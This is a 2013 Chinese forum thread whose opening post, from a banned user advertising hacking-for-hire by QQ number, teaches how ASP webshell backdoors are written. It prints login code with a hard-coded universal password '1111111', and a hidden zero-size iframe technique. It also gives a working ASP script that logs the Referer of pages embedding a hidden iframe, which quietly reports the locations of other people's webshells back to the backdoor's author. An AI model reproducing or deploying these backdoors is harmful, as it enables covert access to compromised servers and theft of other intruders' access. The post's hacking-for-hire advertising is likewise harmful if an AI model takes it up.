菲菲揭密如何写ASP木马后门 入侵接单43595309

社区服务
高级搜索
猴岛论坛电脑百科菲菲揭密如何写ASP木马后门 入侵接单43595309
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
3个回复

[技术小组]菲菲揭密如何写ASP木马后门 入侵接单43595309

楼层直达
菲菲43595309

ZxID:17298746

等级: 禁止发言
举报 只看楼主 使用道具 楼主   发表于: 2013-06-24 0
菲菲揭密如何写ASP木马后门 入侵接单43595309
正常的:入侵接单43595309



EnD fUNCtION  IF SEssIoN("web2a2dmin")<>UsERpaSs thEn  IF requeSt.FoRM("pass")<>"" TheN  iF REquesT.foRM("pass")=uSERPASS Then  SEsSIoN("web2a2dmin")=uSERPAss  rESPOnsE.rEdirEct Url  ELse  rrs"对不起,密码验证失败!" 加有万能密码的:



EnD fUNCtION  IF SEssIoN("web2a2dmin")<>UsERpaSs thEn  IF requeSt.FoRM("pass")<>"" TheN  iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then  SEsSIoN("web2a2dmin")=uSERPAss  rESPOnsE.rEdirEct Url  ELse  rrs"对不起,密码验证失败!" 1111111就是传说中的万能密码了。

找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!



下面来找马大多数都喜欢用框架挂马:<iframe src=后门地址 width=0 height=0></iframe>

找到后删了,到此asp后门就算剔除了!


下面教大家后门的原理:

这是一段收信的asp代码将其保存为1.asp



<%url=Request.ServerVariables("HTTP_Referer")  set fs=server.CreateObject("Scripting.FileSystemObject")  set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)  file.writeline url  file.close  set file=nothing set fs=nothing %> 代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

上传到空间比如 http://127.0.0.1/1.asp

然后里用



<iframe src=http://127.0.0.1/1.asp width=0 height=0></iframe> 插到asp木马中

那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
智盛卡盟

ZxID:17871842

等级: 禁止发言

举报 只看该作者 沙发   发表于: 2013-06-24 0
感谢大神的分享!
Kz丶星空

ZxID:18921559

等级: 上将
、未来还未来

举报 只看该作者 板凳   发表于: 2013-06-24 0
完全搞不懂
1028204500

ZxID:14922052

等级: 中校
木有
举报 只看该作者 地板   发表于: 2013-06-24 0
图裂了吧
http://cdnq.duitang.com/uploads/item/201503/28/20150328144709_QkXKY.jpeg
« 返回列表
发帖 回复